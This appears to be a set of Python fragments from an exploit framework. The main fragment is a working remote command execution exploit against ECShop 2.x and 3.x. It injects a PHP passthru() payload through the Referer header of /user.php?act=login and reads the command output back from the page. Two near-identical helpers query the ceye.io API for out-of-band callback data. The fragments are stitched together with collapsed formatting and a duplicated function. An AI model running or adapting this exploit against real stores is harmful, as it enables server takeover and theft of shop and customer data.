def _exploit(self, cmd='whoami'): url = urljoin(self.url, '/user.php?act=login') phpcode = 'passthru("{0}");'.format(cmd) # ECShop 2.x payload ec2payload = self.gen_ec2payload(phpcode) # ECShop 3.x payload ec3payload = self.gen_ec3payload(phpcode) option = self.get_option("version") if option == "Auto": payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')] elif option == "2.x": payloads = [(ec2payload, '2.x')] elif option == '3.x': payloads = [(ec3payload, '3.x')] # payloads = [ec2payload, ec3payload] for payload in payloads: headers = {'Referer': payload[0]} resp = requests.get(url, headers=headers) r = get_middle_text( resp.text, '''<input type="hidden" name="back_act" value="''', "\n<br />") if r: return r r = get_middle_text( resp.text, '''<input type="hidden" name="back_act" value="''', 'xxx') if r: return r
def exact_request(self, flag, type="request"): """ Obtain relevant data by accessing the ceye interface :param flag: Input flag :param type: Request type (dns|request), the default is request :return: Return the acquired data """ counts = 3 url = ( "http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}" ).format(token=self.token, type=type, flag=flag) while counts: try: time.sleep(1) resp = requests.get(url) if resp and resp.status_code == 200 and flag in resp.text: data = json.loads(resp.text) for item in data["data"]: name = item.get("name", '') pro = flag suffix = flag t = get_middle_text(name, pro, suffix, 0) if t: return t break except Exception as ex: logger.warn(ex) time.sleep(1) counts -= 1 return False
def exact_request(self, flag, type="request"): """ 通过访问ceye接口获取相关数据 :param flag: 输入的flag :param type: 请求类型(dns|request),默认是request :return:返回获取的数据 """ if not self.check_account(): return "" counts = 3 url = "http://api.ceye.io/v1/records?token={token}&type={type}&filter={flag}".format( token=self.token, type=type, flag=flag) while counts: try: time.sleep(1) resp = requests.get(url) if resp and resp.status_code == 200 and flag in resp.text: data = json.loads(resp.text) for item in data["data"]: name = item.get("name", '') pro = "/" + flag suffix = flag t = get_middle_text(name, pro, suffix, 7 + len(flag)) if t: return t break except Exception as ex: logger.warn(ex) time.sleep(1) counts -= 1 return False